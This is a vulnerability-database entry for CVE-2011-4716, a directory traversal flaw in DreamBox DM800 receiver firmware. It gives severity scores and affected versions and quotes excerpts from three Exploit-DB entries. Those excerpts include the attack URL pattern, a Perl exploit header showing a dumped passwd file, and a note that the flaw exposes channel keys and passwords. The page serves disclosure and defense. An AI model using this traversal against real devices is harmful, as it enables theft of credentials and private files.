CVE-2011-4716
published 2011-12-08CVE-2011-4716: Directory traversal vulnerability in file in DreamBox DM800 1.6rc3, 1.5rc1, and earlier allows remote attackers to read arbitrary files via the file parameter.
PriorityP335medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.53%
87.8th percentile
Directory traversal vulnerability in file in DreamBox DM800 1.6rc3, 1.5rc1, and earlier allows remote attackers to read arbitrary files via the file parameter.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dream-multimedia-tv | dreambox_dm800_hd_pvr_firmware | — | — |
| dream-multimedia-tv | dreambox_dm800_hd_pvr_firmware | — | — |
| dream-multimedia-tv | dreambox_dm800_hd_se_firmware | <= 1.6 | — |
| dream-multimedia-tv | dreambox_dm800_hd_se_firmware | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DreamBox DM800 - 'file' Local File Disclosure
exploitdb·2011-11-04
CVE-2011-4716 DreamBox DM800 - 'file' Local File Disclosure
DreamBox DM800 - 'file' Local File Disclosure
---
source: https://www.securityfocus.com/bid/50520/info
DreamBox DM800 is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
DreamBox DM800 versions 1.5rc1 and prior are vulnerable.
http://www.example.com/file/?file=[LFD]
Exploit-DB
DreamBox DM800 1.5rc1 - File Disclosure
exploitdb·2011-11-04
CVE-2011-4716 DreamBox DM800 1.5rc1 - File Disclosure
DreamBox DM800 1.5rc1 - File Disclosure
---
#!/usr/bin/perl
# DreamBox DM800 :0:0:root:/home/root:/bin/sh
# daemon:*:1:1:daemon:/usr/sbin:/bin/sh
# bin:*:2:2:bin:/bin:/bin/sh
# sys:*:3:3:sys:/dev:/bin/sh
# sync:*:4:65534:sync:/bin:/bin/sync
# games:*:5:60:games:/usr/games:/bin/sh
# man:*:6:12:man:/var/cache/man:/bin/sh
# lp:*:7:7:lp:/var/spool/lpd:/bin/sh
# mail:*:8:8:mail:/var/mail:/bin/sh
# news:*:9:9:news:/var/spool/news:/bin/sh
# uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
# proxy:*:13:13:proxy:/bin:/bin/sh
# www-data:*:33:33:www-data:/var/www:/bin/sh
# backup:*:34:34:backup:/var/backups:/bin/sh
# list:*:38:38:Mailing List Manager:/var/list:/bin/sh
# irc:*:39:39:ircd:/var/run/ircd:/bin/sh
# gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
# nobody:*:65534:65534:n
Exploit-DB
DreamBox DM800 - Arbitrary File Download
exploitdb·2011-06-21
CVE-2011-4716 DreamBox DM800 - Arbitrary File Download
DreamBox DM800 - Arbitrary File Download
---
# Exploit Title: [title]
# Date: [date]
# Author: [ShellVision]
# Version: [dm800 <= 1.6rc3]
# Tested on: [dm800 Release 4.6.0 2009-12-24]
DreamBox DM800 Arbitrary File Download Vulnerability
Vendor: Dream Multimedia GmbH
Product web page: http://www.dream-multimedia-tv.de
Affected version: DM800 (may affect others version)
Summary: The Dreambox is a series of Linux-powered
DVB satellite, terrestrial and cable digital television
receivers (set-top box).
Desc: Dreambox suffers from a file download vulnerability
thru directory traversal with appending the '/' character
in the HTTP GET method of the affected host address. The
attacker can get to sensitive information like paid channel
keys, usernames, passwords, config and plug-ins info, et
No writeups or analysis indexed.
2011-12-08
Published